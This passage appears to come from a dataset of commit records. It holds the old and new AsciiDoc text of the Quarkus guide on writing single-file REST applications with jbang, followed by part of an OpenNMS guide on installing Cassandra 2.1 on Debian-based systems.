<dependency1> <dependency2>\n----\n\nIs illustrating how you add dependencies to this script. This is a feature of `jbang`.\n\nGo ahead and update this line to include the `quarkus-resteasy` dependency like so:\n\n[source,shell,subs=attributes+]\n----\n\/\/DEPS io.quarkus:quarkus-resteasy:{quarkus-version}\n----\n\nNow, run `jbang quarkusapp.java` and you will see `jbang` resolving this dependency and building the jar with help from Quarkus' jbang integration.\n\n[source,shell,subs=attributes+] \n----\n$ jbang quarkusapp.java\n\u276f jbang quarkusapp.java\n[jbang] Resolving dependencies...\n[jbang] Resolving io.quarkus:quarkus-resteasy:{quarkus-version}...Done\n[jbang] Dependencies resolved\n[jbang] Building jar...\n[jbang] Post build with io.quarkus.launcher.JBangIntegration\nAug 30, 2020 5:40:55 AM org.jboss.threads.Version <clinit>\nINFO: JBoss Threads version 3.1.1.Final\nAug 30, 2020 5:40:56 AM io.quarkus.deployment.QuarkusAugmentor run\nINFO: Quarkus augmentation completed in 722ms\nHello World\n----\n\nFor now the application does nothing new.\n\n[TIP]\n.How do I edit this file and get content assist ?\n====\nAs there is nothing but a `.java` file, most IDE's does not handle content assist well.\nTo work around that you can run `jbang edit quarkusapp.java` which will print out a directory that will have a temporary project setup you can use in your IDE.\n\nOn Linux\/macOS you can run `<idecommand> `jbang edit quarkusapp.java``.\n\nIf you add dependencies while editing you can get jbang to automatically refresh\nthe IDE project using `jbang edit --live=<idecommand> quarkusapp.java`.\n====\n\n\n=== The JAX-RS resources\n\nNow let us replace the class with one that uses Quarkus features:\n\n[source,java]\n----\nimport io.quarkus.runtime.Quarkus;\nimport javax.enterprise.context.ApplicationScoped;\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Path;\n\n@Path(\"\/hello\")\n@ApplicationScoped\npublic class quarkusapp {\n\n @GET\n public String sayHello() {\n return \"hello\";\n }\n\n public static void main(String[] args) {\n Quarkus.run(args);\n }\n}\n----\n\nIt's a very simple class with a main method that starts Quarkus with a REST endpoint, returning \"hello\" to requests on \"\/hello\".\n\n[TIP]\n.Why is the `main` method there ?\n====\nA `main` method is currently needed for the `jbang` integration to work - we might remove this requirement in the future.\n====\n\n== Running the application\n\nNow when you run the application you will see Quarkus start up.\n\nUse: `jbang quarkusapp.java`:\n\n[source,shell,subs=attributes+]\n----\n$ jbang quarkusapp.java\n jbang quarkusapp.java\n[jbang] Building jar...\n[jbang] Post build with io.quarkus.launcher.JBangIntegration\nAug 30, 2020 5:49:01 AM org.jboss.threads.Version <clinit>\nINFO: JBoss Threads version 3.1.1.Final\nAug 30, 2020 5:49:02 AM io.quarkus.deployment.QuarkusAugmentor run\nINFO: Quarkus augmentation completed in 681ms\n__ ____ __ _____ ___ __ ____ ______\n --\/ __ \\\/ \/ \/ \/ _ | \/ _ \\\/ \/\/_\/ \/ \/ \/ __\/\n -\/ \/_\/ \/ \/_\/ \/ __ |\/ , _\/ ,< \/ \/_\/ \/\\ \\\n--\\___\\_\\____\/_\/ |_\/_\/|_\/_\/|_|\\____\/___\/\n2020-08-30 05:49:03,255 INFO [io.quarkus] (main) Quarkus {quarkus-version} on JVM started in 0.638s. Listening on: http:\/\/0.0.0.0:8080\n2020-08-30 05:49:03,272 INFO [io.quarkus] (main) Profile prod activated.\n2020-08-30 05:49:03,272 INFO [io.quarkus] (main) Installed features: [cdi, resteasy]\n----\n\nOnce started, you can request the provided endpoint:\n\n[source,shell]\n----\n$ curl -w \"\\n\" http:\/\/localhost:8080\/hello\nhello\n----\n\nHit `CTRL+C` to stop the application, or keep it running and enjoy the blazing fast hot-reload.\n\n[TIP]\n.Automatically add newline with `curl -w \"\\n\"`\n====\nWe are using `curl -w \"\\n\"` in this example to avoid your terminal printing a '%' or put both result and next command prompt on the same line.\n====\n\n[TIP]\n.Why is `quarkus-resteasy` not resolved ? \n====\nIn this second run you should not see a line saying it is resolving `quarkus-resteasy` as jbang caches the dependency resolution between runs.\nIf you want to clear the caches to force resolution use `jbang cache clear`.\n====\n\n== Using injection\n\nDependency injection in Quarkus is based on ArC which is a CDI-based dependency injection solution tailored for Quarkus' architecture.\nYou can learn more about it in the link:cdi-reference[Contexts and Dependency Injection guide].\n\nArC comes as a dependency of `quarkus-resteasy` so you already have it handy.\n\nLet's modify the application and add a companion bean.\n\nNormally you would add a separate class, but as we are aiming to have it all in one file you will add a \nnested class.\n\nAdd the following *inside* the `quarkusapp` class body.\n\n[source, java]\n----\n@ApplicationScoped\nstatic public class GreetingService {\n\n public String greeting(String name) {\n return \"hello \" + name;\n }\n\n}\n----\n\n[TIP]\n.Use of nested static public classes\n====\nWe are using a nested static public class instead of a top level class for two reasons:\n\n 1. jbang currently does not support multiple source files\n 2. All Java frameworks relying on introspection have challenges using top level classes as they are not as visible as public classes; and in Java there can only be one top level public class in a file.\n\n====\n\nEdit the `quarksapp` class to inject the `GreetingService` and create a new endpoint using it, you should end up with something like:\n\n[source, java]\n----\n\/\/usr\/bin\/env jbang \"$0\" \"$@\" ; exit $?\n\/\/DEPS io.quarkus:quarkus-resteasy:999-SNAPSHOT\n\nimport io.quarkus.runtime.Quarkus;\nimport javax.enterprise.context.ApplicationScoped;\nimport javax.inject.Inject;\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Path;\nimport javax.ws.rs.Produces;\nimport javax.ws.rs.core.MediaType;\nimport org.jboss.resteasy.annotations.jaxrs.PathParam;\n\n@Path(\"\/hello\")\n@ApplicationScoped\npublic class quarkusapp {\n\n @GET\n public String sayHello() {\n return \"hello from Quarkus with jbang.dev\";\n }\n\n public static void main(String[] args) {\n Quarkus.run(args);\n }\n\n @Inject\n GreetingService service;\n\n @GET\n @Produces(MediaType.TEXT_PLAIN)\n @Path(\"\/greeting\/{name}\")\n public String greeting(@PathParam String name) {\n return service.greeting(name);\n }\n\n @ApplicationScoped\n static public class GreetingService {\n\n public String greeting(String name) {\n return \"hello \" + name;\n }\n }\n}\n----\n\nNow when you run `jbang quarkusapp.java` you can check what the new end point returns:\n\n[source,shell,subs=attributes+]\n----\n$ curl -w \"\\n\" http:\/\/localhost:8080\/hello\/greeting\/quarkus\nhello null\n----\n\nNow that is unexpected, why is it returning `hello null` and not `hello quarkus`?\n\nThe reason is that JAX-RS `@PathParam` relies on the `-parameters` compiler flag to be set to be able to map `{name}` to the `name` parameter.\n\nWe fix that by adding the following comment instruction to the file:\n\n[source,shell,subs=attributes+]\n----\n\/\/JAVAC_OPTIONS -parameters\n----\n\nNow when you run with `jbang quarkusapp.java` the end point should return what you expect:\n\n[source,shell,subs=attributes+]\n----\n$ curl -w \"\\n\" http:\/\/localhost:8080\/hello\/greeting\/quarkus\nhello quarkus\n----\n\n== Debugging\n\nTo debug the application you use `jbang --debug quarkusapp.java` and you can use your IDE to connect on port 4004; if you want to use the\nmore traditonal Quarkus debug port you can use `jbang --debug=5005 quarkusapp.java`.\n\nNote: `jbang` debugging always suspends thus you need to connect the debugger to have the application run.\n\n== Logging\n\nTo use logging in Quarkus scripting with jbang you do as usual, with configuring a logger, i.e.\n\n[source,java]\n----\npublic static final Logger LOG = Logger.getLogger(quarkusapp.class);\n----\n\nTo get it to work you need to add a Java option to ensure the logging is initialized properly, i.e.\n\n[source,java]\n----\n\/\/JAVA_OPTIONS -Djava.util.logging.manager=org.jboss.logmanager.LogManager\n----\n\nWith that in place running `jbang quarkusapp.java` will log and render as expected.\n\n== Configuring Application\n\nYou can use `\/\/Q:CONFIG <property>=<value>` to set up static configuration for your application.\n\nI.e. if you wanted to add the `smallrye-openapi` and `swagger-ui` extensions and have the Swagger UI always show up you would add the following:\n\n[source,java,subs=attributes+]\n----\n\/\/DEPS io.quarkus:quarkus-smallrye-openapi:{quarkus-version}\n\/\/DEPS io.quarkus:quarkus-swagger-ui:{quarkus-version}\n\/\/Q:CONFIG quarkus.swagger-ui.always-include=true\n----\n\nNow during build the `quarkus.swagger-ui.always-include` will be generated into the resulting jar and `http:\/\/0.0.0.0:8080\/swagger-ui` will be available when run.\n\n== Running as a native application\n\nIf you have the `native-image` binary installed and `GRAALVM_HOME` set, you can get the native executable built and run using `jbang --native quarkusapp.java`:\n\n[source,shell,subs=attributes+]\n----\n$ jbang --native quarkusapp\n jbang --native quarkusapp.java\n[jbang] Building jar...\n[jbang] Post build with io.quarkus.launcher.JBangIntegration\nAug 30, 2020 6:21:15 AM org.jboss.threads.Version <clinit>\nINFO: JBoss Threads version 3.1.1.Final\nAug 30, 2020 6:21:16 AM io.quarkus.deployment.pkg.steps.JarResultBuildStep buildNativeImageThinJar\nINFO: Building native image source jar: \/var\/folders\/yb\/sytszfld4sg8vwr1h0w20jlw0000gn\/T\/quarkus-jbang3291688251685023074\/quarkus-application-native-image-source-jar\/quarkus-application-runner.jar\nAug 30, 2020 6:21:16 AM io.quarkus.deployment.pkg.steps.NativeImageBuildStep build\nINFO: Building native image from \/var\/folders\/yb\/sytszfld4sg8vwr1h0w20jlw0000gn\/T\/quarkus-jbang3291688251685023074\/quarkus-application-native-image-source-jar\/quarkus-application-runner.jar\nAug 30, 2020 6:21:16 AM io.quarkus.deployment.pkg.steps.NativeImageBuildStep checkGraalVMVersion\nINFO: Running Quarkus native-image plugin on GraalVM Version 20.1.0 (Java Version 11.0.7)\nAug 30, 2020 6:21:16 AM io.quarkus.deployment.pkg.steps.NativeImageBuildStep build\nINFO: \/Users\/max\/.sdkman\/candidates\/java\/20.1.0.r11-grl\/bin\/native-image -J-Djava.util.logging.manager=org.jboss.logmanager.LogManager -J-Dsun.nio.ch.maxUpdateArraySize=100 -J-Dvertx.logger-delegate-factory-class-name=io.quarkus.vertx.core.runtime.VertxLogDelegateFactory -J-Dvertx.disableDnsResolver=true -J-Dio.netty.leakDetection.level=DISABLED -J-Dio.netty.allocator.maxOrder=1 -J-Duser.language=en -J-Dfile.encoding=UTF-8 --initialize-at-build-time= -H:InitialCollectionPolicy=com.oracle.svm.core.genscavenge.CollectionPolicy\\$BySpaceAndTime -H:+JNI -jar quarkus-application-runner.jar -H:FallbackThreshold=0 -H:+ReportExceptionStackTraces -H:-AddAllCharsets -H:EnableURLProtocols=http --no-server -H:-UseServiceLoaderFeature -H:+StackTrace quarkus-application-runner\n\nAug 30, 2020 6:22:31 AM io.quarkus.deployment.QuarkusAugmentor run\nINFO: Quarkus augmentation completed in 76010ms\n__ ____ __ _____ ___ __ ____ ______\n --\/ __ \\\/ \/ \/ \/ _ | \/ _ \\\/ \/\/_\/ \/ \/ \/ __\/\n -\/ \/_\/ \/ \/_\/ \/ __ |\/ , _\/ ,< \/ \/_\/ \/\\ \\\n--\\___\\_\\____\/_\/ |_\/_\/|_\/_\/|_|\\____\/___\/\n2020-08-30 06:22:32,012 INFO [io.quarkus] (main) Quarkus {quarkus-version} native started in 0.017s. Listening on: http:\/\/0.0.0.0:8080\n2020-08-30 06:22:32,013 INFO [io.quarkus] (main) Profile prod activated.\n2020-08-30 06:22:32,013 INFO [io.quarkus] (main) Installed features: [cdi, resteasy]\n----\n\nThis native build will take some time on first run but any subsequent runs (without changing `quarkusapp.java`) will be close to instant:\n\n[source,shell,subs=attributes+]\n----\n$ jbang --native quarkusapp.java\n__ ____ __ _____ ___ __ ____ ______\n --\/ __ \\\/ \/ \/ \/ _ | \/ _ \\\/ \/\/_\/ \/ \/ \/ __\/\n -\/ \/_\/ \/ \/_\/ \/ __ |\/ , _\/ ,< \/ \/_\/ \/\\ \\\n--\\___\\_\\____\/_\/ |_\/_\/|_\/_\/|_|\\____\/___\/\n2020-08-30 06:23:36,846 INFO [io.quarkus] (main) Quarkus {quarkus-version} native started in 0.015s. Listening on: http:\/\/0.0.0.0:8080\n2020-08-30 06:23:36,846 INFO [io.quarkus] (main) Profile prod activated.\n2020-08-30 06:23:36,846 INFO [io.quarkus] (main) Installed features: [cdi, resteasy]\n----\n\n=== Conclusion\n\nIf you want to get started with Quarkus or write something quickly, Quarkus Scripting with jbang lets you do that. No Maven, no Gradle - just a Java file. In this guide we outlined the very basics on using Quarkus with jbang; if you want to learn more about what jbang can do go see https:\/\/jbang.dev.\n","old_contents":"\/\/\/\/\nThis guide is maintained in the main Quarkus repository\nand pull requests should be submitted there:\nhttps:\/\/github.com\/quarkusio\/quarkus\/tree\/master\/docs\/src\/main\/asciidoc\n\/\/\/\/\n= Quarkus - Scripting with Quarkus\n:extension-status: preview\n\nQuarkus provides integration with https:\/\/jbang.dev[jbang]] which allows you to write java scripts\/applications requiring no maven nor gradle to get running.\n\nIn this guide, we will see how you can write a REST application using just a singe java file.\n\ninclude::.\/status-include.adoc[]\n\n== Prerequisites\n\nTo complete this guide, you need:\n\n* less than 5 minutes\n* https:\/\/jbang.dev\/download[jbang v0.40.3+]\n* an IDE\n* GraalVM installed if you want to run in native mode\n\n== Solution\n\nNormally we would link to a Git repository to clone but in this case there is no additional files than the following:\n\n[source,java,subs=attributes+]\n----\n\/\/usr\/bin\/env jbang \"$0\" \"$@\" ; exit $?\n\/\/DEPS io.quarkus:quarkus-resteasy:999-SNAPSHOT\n\/\/JAVAC_OPTIONS -parameters\n\/\/JAVA_OPTIONS -Djava.util.logging.manager=org.jboss.logmanager.LogManager\n\nimport io.quarkus.runtime.Quarkus;\nimport javax.enterprise.context.ApplicationScoped;\nimport javax.inject.Inject;\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Path;\nimport javax.ws.rs.Produces;\nimport javax.ws.rs.core.MediaType;\nimport org.jboss.resteasy.annotations.jaxrs.PathParam;\nimport org.jboss.logging.Logger;\n\n@Path(\"\/hello\")\n@ApplicationScoped\npublic class quarkusapp {\n\n @GET\n public String sayHello() {\n return \"hello\";\n }\n\n public static void main(String[] args) {\n Quarkus.run(args);\n }\n\n @Inject\n GreetingService service;\n\n @GET\n @Produces(MediaType.TEXT_PLAIN)\n @Path(\"\/greeting\/{name}\")\n public String greeting(@PathParam String name) {\n return service.greeting(name);\n }\n\n @ApplicationScoped\n static public class GreetingService {\n\n public String greeting(String name) {\n return \"hello \" + name;\n }\n }\n}\n----\n\n== Architecture\n\nIn this guide, we create a straightforward application serving a `hello` endpoint with a single source file, no additional build files like `pom.xml` or `build.gradle` needed. To demonstrate dependency injection, this endpoint uses a `greeting` bean.\n\nimage::getting-started-architecture.png[alt=Architecture]\n\n== Creating the initial file\n\nFirst, we need a java file. jbang lets you create an initial version using:\n\n[source,shell,subs=attributes+]\n----\njbang scripting\/quarkusapp.java\ncd scripting\n----\n\nThis command generates a .java file that you can directly run on Linux and OS X, i.e. `.\/quarkusapp.java` - on Windows you need to use `jbang quarkusapp.java`\n\nThis initial version will print `Hello World` when run.\n\nOnce generated, look at the `quarkusapp.java`.\n\nYou will find at the top a line looking like this:\n\n[source,java]\n----\n\/\/usr\/bin\/env jbang \"$0\" \"$@\" ; exit $?\n----\n\nThis line is what on Linux and OS X allows you to run it as a script. On Windows this line is ignored.\n\nThe next line\n\n[source,java]\n----\n\/\/ \/\/DEPS <dependency1> <dependency2>\n----\n\nIs illustrating how you add dependencies to this script. This is a feature of `jbang`.\n\nGo ahead and update this line to include the `quarkus-resteasy` dependency like so:\n\n[source,shell,subs=attributes+]\n----\n\/\/DEPS io.quarkus:quarkus-resteasy:{quarkus-version}\n----\n\nNow, run `jbang quarkusapp.java` and you will see `jbang` resolving this dependency and building the jar with help from Quarkus jbang integration.\n\n[source,shell,subs=attributes+] \n----\n$ jbang quarkusapp.java\n\u276f jbang quarkusapp.java\n[jbang] Resolving dependencies...\n[jbang] Resolving io.quarkus:quarkus-resteasy:{quarkus-version}...Done\n[jbang] Dependencies resolved\n[jbang] Building jar...\n[jbang] Post build with io.quarkus.launcher.JBangIntegration\nAug 30, 2020 5:40:55 AM org.jboss.threads.Version <clinit>\nINFO: JBoss Threads version 3.1.1.Final\nAug 30, 2020 5:40:56 AM io.quarkus.deployment.QuarkusAugmentor run\nINFO: Quarkus augmentation completed in 722ms\nHello World\n----\n\nFor now the application does nothing new.\n\n[TIP]\n.How do I edit this file and get content assist ?\n====\nAs there is nothing but a `.java` file most IDE's does not handle content assist well.\nTo work around that you can run `jbang edit quarkusapp.java` which will print out a directory that will have a temporary project setup you can use in your IDE.\n\nOn Linux\/OSX you can run `<idecommand> `jbang edit quarkusapp.java``.\n\nIf you add dependencies while editing you can get jbang to automatically refresh\nthe IDE project using `jbang edit --live=<idecommand> quarkusapp.java`.\n====\n\n\n=== The JAX-RS resources\n\nNow let us replace the class with one that uses Quarkus features.\n\n[source,java]\n----\nimport io.quarkus.runtime.Quarkus;\nimport javax.enterprise.context.ApplicationScoped;\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Path;\n\n@Path(\"\/hello\")\n@ApplicationScoped\npublic class quarkusapp {\n\n @GET\n public String sayHello() {\n return \"hello\";\n }\n\n public static void main(String[] args) {\n Quarkus.run(args);\n }\n}\n----\n\nIt's a very simple class with a main method that starts Quarkus with a REST endpoint, returning \"hello\" to requests on \"\/hello\".\n\n[TIP]\n.Why is the `main` method there ?\n====\nA `main` method is currently needed for the `jbang` integration to work - will be possible to remove in the future.\n====\n\n== Running the application\n\nNow when youn run the application you will see Quarkus start up.\n\nUse: `jbang quarkusapp.java`:\n\n[source,shell,subs=attributes+]\n----\n$ jbang quarkusapp.java\n jbang quarkusapp.java\n[jbang] Building jar...\n[jbang] Post build with io.quarkus.launcher.JBangIntegration\nAug 30, 2020 5:49:01 AM org.jboss.threads.Version <clinit>\nINFO: JBoss Threads version 3.1.1.Final\nAug 30, 2020 5:49:02 AM io.quarkus.deployment.QuarkusAugmentor run\nINFO: Quarkus augmentation completed in 681ms\n__ ____ __ _____ ___ __ ____ ______\n --\/ __ \\\/ \/ \/ \/ _ | \/ _ \\\/ \/\/_\/ \/ \/ \/ __\/\n -\/ \/_\/ \/ \/_\/ \/ __ |\/ , _\/ ,< \/ \/_\/ \/\\ \\\n--\\___\\_\\____\/_\/ |_\/_\/|_\/_\/|_|\\____\/___\/\n2020-08-30 05:49:03,255 INFO [io.quarkus] (main) Quarkus {quarkus-version} on JVM started in 0.638s. Listening on: http:\/\/0.0.0.0:8080\n2020-08-30 05:49:03,272 INFO [io.quarkus] (main) Profile prod activated.\n2020-08-30 05:49:03,272 INFO [io.quarkus] (main) Installed features: [cdi, resteasy]\n----\n\nOnce started, you can request the provided endpoint:\n\n```\n$ curl -w \"\\n\" http:\/\/localhost:8080\/hello\nhello\n```\n\nHit `CTRL+C` to stop the application, or keep it running and enjoy the blazing fast hot-reload.\n\n[TIP]\n.Automatically add newline with `curl -w \"\\n\"`\n====\nWe are using `curl -w \"\\n\"` in this example to avoid your terminal printing a '%' or put both result and next command prompt on the same line.\n====\n\n[TIP]\n.Why is `quarkus-resteasy` not resolved ? \n====\nIn this second run you should not see a line saying it is resolving `quarkus-resteasy` as jbang caches the dependency resolution between runs.\nIf you want to clear the caches to force resolution use `jbang cache clear`\n====\n\n== Using injection\n\nDependency injection in Quarkus is based on ArC which is a CDI-based dependency injection solution tailored for Quarkus' architecture.\nYou can learn more about it in the link:cdi-reference[Contexts and Dependency Injection guide].\n\nArC comes as a dependency of `quarkus-resteasy` so you already have it handy.\n\nLet's modify the application and add a companion bean.\n\nNormally you would add a separate class, but as we are aiming to have it all in one file you will add a \nnested class.\n\nAdd the following *inside* the `quarkusapp` class body.\n\n[source, java]\n----\n@ApplicationScoped\nstatic public class GreetingService {\n\n public String greeting(String name) {\n return \"hello \" + name;\n }\n\n}\n----\n\n[TIP]\n.Use of nested static public classes\n====\nWe are using a nested static public class instead of a top level class for two reasons:\n\n 1. jbang currently does not currently support multiple source files\n 2. All Java frameworks relying on introspection have challenges using top level classes as they are not as visible as public classes; and in java there can only be one top level public class in a file.\n\n====\n\nEdit the `quarksapp` class to inject the `GreetingService` and create a new endpoint using it, you should end up with something like:\n\n[source, java]\n----\n\/\/usr\/bin\/env jbang \"$0\" \"$@\" ; exit $?\n\/\/DEPS io.quarkus:quarkus-resteasy:999-SNAPSHOT\n\nimport io.quarkus.runtime.Quarkus;\nimport javax.enterprise.context.ApplicationScoped;\nimport javax.inject.Inject;\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Path;\nimport javax.ws.rs.Produces;\nimport javax.ws.rs.core.MediaType;\nimport org.jboss.resteasy.annotations.jaxrs.PathParam;\n\n@Path(\"\/hello\")\n@ApplicationScoped\npublic class quarkusapp {\n\n @GET\n public String sayHello() {\n return \"hello from Quarkus with jbang.dev\";\n }\n\n public static void main(String[] args) {\n Quarkus.run(args);\n }\n\n @Inject\n GreetingService service;\n\n @GET\n @Produces(MediaType.TEXT_PLAIN)\n @Path(\"\/greeting\/{name}\")\n public String greeting(@PathParam String name) {\n return service.greeting(name);\n }\n\n @ApplicationScoped\n static public class GreetingService {\n\n public String greeting(String name) {\n return \"hello \" + name;\n }\n }\n}\n----\n\nNow when you run `jbang quarkusapp.java` you can check what the new end point returns:\n\n[source,shell,subs=attributes+]\n----\n$ curl -w \"\\n\" http:\/\/localhost:8080\/hello\/greeting\/quarkus\nhello null\n----\n\nNow that is unexpected, why is it returning `hello null` and not `hello quarkus` ?\n\nThe reason is that JAX-RS `@PathParam` relies on the `-parameters` compiler flag to be set to be able to map `{name}` to the `name` parameter.\n\nWe fix that by adding the following comment instruction to the file:\n\n[source,shell,subs=attributes+]\n----\n\/\/JAVAC_OPTIONS -parameters\n----\n\nNow when you run with `jbang quarkusapp.java` the end point should return what you expect:\n\n[source,shell,subs=attributes+]\n----\n$ curl -w \"\\n\" http:\/\/localhost:8080\/hello\/greeting\/quarkus\nhello quarkus\n----\n\n== Debugging\n\nTo debug the application you use `jbang --debug quarkusapp.java` and you can use your IDE to connect on port 4004; if you want to use the\nmore traditonal Quarkus debug port you can use `jbang --debug=5005 quarkusapp.java`.\n\nNote: `jbang` debugging always suspends thus you need to connect the debugger to have the application run.\n\n== Logging\n\nTo use logging in Quarkus scripting with jbang you do as usual, with configuring a logger, i.e.\n\n[source,java]\n----\npublic static final Logger LOG = Logger.getLogger(quarkusapp.class);\n----\n\nTo get it to work you need to add a java option to ensure the logging is initialized properly, i.e.\n\n[source,java]\n----\n\/\/JAVA_OPTIONS -Djava.util.logging.manager=org.jboss.logmanager.LogManager\n----\n\nWith that in place running `jbang quarkusapp.java` will log and render as expected.\n\n== Configuring Application\n\nYou can use `\/\/Q:CONFIG <property>=<value>` to setup static configuration for your application.\n\ni.e. if you wanted to add the `smallrye-openapi` and `swagger-ui` and have the swagger-ui always show up you would add the following:\n\n[source,java,subs=attributes+]\n----\n\/\/DEPS io.quarkus:quarkus-smallrye-openapi:{quarkus-version}\n\/\/DEPS io.quarkus:quarkus-swagger-ui:{quarkus-version}\n\/\/Q:CONFIG quarkus.swagger-ui.always-include=true\n----\n\nNow during build the `quarkus.swagger-ui.always-include` will be generated into the resulting jar and `http:\/\/0.0.0.0:8080\/swagger-ui` will be available when run.\n\n== Running as a native application\n\nIf you have `native-image` binary installed and GRAALVM_HOME set you can get native binary built and run using `jbang --native quarkusapp.java`:\n\n[source,shell,subs=attributes+]\n----\n$ jbang --native quarkusapp\n jbang --native quarkusapp.java\n[jbang] Building jar...\n[jbang] Post build with io.quarkus.launcher.JBangIntegration\nAug 30, 2020 6:21:15 AM org.jboss.threads.Version <clinit>\nINFO: JBoss Threads version 3.1.1.Final\nAug 30, 2020 6:21:16 AM io.quarkus.deployment.pkg.steps.JarResultBuildStep buildNativeImageThinJar\nINFO: Building native image source jar: \/var\/folders\/yb\/sytszfld4sg8vwr1h0w20jlw0000gn\/T\/quarkus-jbang3291688251685023074\/quarkus-application-native-image-source-jar\/quarkus-application-runner.jar\nAug 30, 2020 6:21:16 AM io.quarkus.deployment.pkg.steps.NativeImageBuildStep build\nINFO: Building native image from \/var\/folders\/yb\/sytszfld4sg8vwr1h0w20jlw0000gn\/T\/quarkus-jbang3291688251685023074\/quarkus-application-native-image-source-jar\/quarkus-application-runner.jar\nAug 30, 2020 6:21:16 AM io.quarkus.deployment.pkg.steps.NativeImageBuildStep checkGraalVMVersion\nINFO: Running Quarkus native-image plugin on GraalVM Version 20.1.0 (Java Version 11.0.7)\nAug 30, 2020 6:21:16 AM io.quarkus.deployment.pkg.steps.NativeImageBuildStep build\nINFO: \/Users\/max\/.sdkman\/candidates\/java\/20.1.0.r11-grl\/bin\/native-image -J-Djava.util.logging.manager=org.jboss.logmanager.LogManager -J-Dsun.nio.ch.maxUpdateArraySize=100 -J-Dvertx.logger-delegate-factory-class-name=io.quarkus.vertx.core.runtime.VertxLogDelegateFactory -J-Dvertx.disableDnsResolver=true -J-Dio.netty.leakDetection.level=DISABLED -J-Dio.netty.allocator.maxOrder=1 -J-Duser.language=en -J-Dfile.encoding=UTF-8 --initialize-at-build-time= -H:InitialCollectionPolicy=com.oracle.svm.core.genscavenge.CollectionPolicy\\$BySpaceAndTime -H:+JNI -jar quarkus-application-runner.jar -H:FallbackThreshold=0 -H:+ReportExceptionStackTraces -H:-AddAllCharsets -H:EnableURLProtocols=http --no-server -H:-UseServiceLoaderFeature -H:+StackTrace quarkus-application-runner\n\nAug 30, 2020 6:22:31 AM io.quarkus.deployment.QuarkusAugmentor run\nINFO: Quarkus augmentation completed in 76010ms\n__ ____ __ _____ ___ __ ____ ______\n --\/ __ \\\/ \/ \/ \/ _ | \/ _ \\\/ \/\/_\/ \/ \/ \/ __\/\n -\/ \/_\/ \/ \/_\/ \/ __ |\/ , _\/ ,< \/ \/_\/ \/\\ \\\n--\\___\\_\\____\/_\/ |_\/_\/|_\/_\/|_|\\____\/___\/\n2020-08-30 06:22:32,012 INFO [io.quarkus] (main) Quarkus {quarkus-version} native started in 0.017s. Listening on: http:\/\/0.0.0.0:8080\n2020-08-30 06:22:32,013 INFO [io.quarkus] (main) Profile prod activated.\n2020-08-30 06:22:32,013 INFO [io.quarkus] (main) Installed features: [cdi, resteasy]\n----\n\nThis native build will take some time on first run but any subsequent runs (without changing `quarkusapp.java`) will be close to instant:\n\n[source,shell,subs=attributes+]\n----\n$ jbang --native quarkusapp.java\n__ ____ __ _____ ___ __ ____ ______\n --\/ __ \\\/ \/ \/ \/ _ | \/ _ \\\/ \/\/_\/ \/ \/ \/ __\/\n -\/ \/_\/ \/ \/_\/ \/ __ |\/ , _\/ ,< \/ \/_\/ \/\\ \\\n--\\___\\_\\____\/_\/ |_\/_\/|_\/_\/|_|\\____\/___\/\n2020-08-30 06:23:36,846 INFO [io.quarkus] (main) Quarkus {quarkus-version} native started in 0.015s. Listening on: http:\/\/0.0.0.0:8080\n2020-08-30 06:23:36,846 INFO [io.quarkus] (main) Profile prod activated.\n2020-08-30 06:23:36,846 INFO [io.quarkus] (main) Installed features: [cdi, resteasy]\n----\n\n=== Conclusion\n\nIf you want to get started with Quarkus or write something quickly, Quarkus Scripting with jbang lets you do that. No Maven, no Gradle - just a java file. In this guide we outlined the very basics on using Quarkus with jbang; if you want to learn more about what jbang can do go see https:\/\/jbang.dev.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1bb0bb24f668be6213f2a21f981360f7c232ffc9","subject":"HZN-352: Reviewer fixes","message":"HZN-352: Reviewer fixes","repos":"aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms","old_file":"opennms-doc\/guide-install\/src\/asciidoc\/text\/newts\/cassandra-debian.adoc","new_file":"opennms-doc\/guide-install\/src\/asciidoc\/text\/newts\/cassandra-debian.adoc","new_contents":"\n\/\/ Allow GitHub image rendering\n:imagesdir: ..\/..\/images\n\n[[gi-install-cassandra-debian]]\n==== Installing on Debian-based systems\n\nThis section describes how to install the latest _Cassandra 2.1.x_ release on a _Debian_-based system for _Newts_.\nThe first step is to add the _DataStax_ community repository and install the required _GPG Key_ to verify the integrity of the _DEB packages_.\nInstallation of the package is done with _apt_ and the _Cassandra_ service is added to the runlevel configuration.\n\nNOTE: This description was built on _Debian 8_ and _Ubuntu 14.04 LTS_.\n\n.Add the DataStax repository\n[source, bash]\n----\nvi \/etc\/apt\/sources.list.d\/cassandra.sources.list\n----\n\n.Content of the cassandra.sources.list file\n[source, bash]\n----\ndeb http:\/\/debian.datastax.com\/community stable main\n----\n\n.Install GPG key to verify DEB packages\n[source, bash]\n----\nwget -O - http:\/\/debian.datastax.com\/debian\/repo_key | apt-key add -\n----\n\n.Install latest Cassandra 2.1.x package\n[source, bash]\n----\napt-get update\napt-get install dsc21=2.1.8-1 cassandra=2.1.8\n----\n\nThe _Cassandra_ service is added to the runlevel configuration and is automatically started after installing the package.\n\nTIP: Verify whether the _Cassandra_ service is automatically started after rebooting the server.\n","old_contents":"\n\/\/ Allow GitHub image rendering\n:imagesdir: ..\/..\/images\n\n[[gi-install-cassandra-debian]]\n==== Installing on Debian-based systems\n\nThis section describes how to install the latest _Cassandra 2.1.x_ release on a _Debian_ based systems for _Newts_.\nThe first steps add the _DataStax_ community repository and install the required _GPG Key_ to verify the integrity of the _DEB packages_.\nInstallation of the package is done with _apt_ and the _Cassandra_ service is added to the run level configuration.\n\nNOTE: This description is build on _Debian 8_ and _Ubuntu 14.04 LTS_.\n\n.Add DataStax repository\n[source, bash]\n----\nvi \/etc\/apt\/sources.list.d\/cassandra.sources.list\n----\n\n.Content of the cassandra.sources.list file\n[source, bash]\n----\ndeb http:\/\/debian.datastax.com\/community stable main\n----\n\n.Install GPG key to verify DEB packages\n[source, bash]\n----\nwget -O - http:\/\/debian.datastax.com\/debian\/repo_key | apt-key add -\n----\n\n.Install latest Cassandra 2.1.x package\n[source, bash]\n----\napt-get update\napt-get install dsc21=2.1.8-1 cassandra=2.1.8\n----\n\nThe _Cassandra_ service is added to the run level configuration and is automatically started after installing the package.\n\nTIP: Verify if the _Cassandra_ service is automatically started after rebooting the 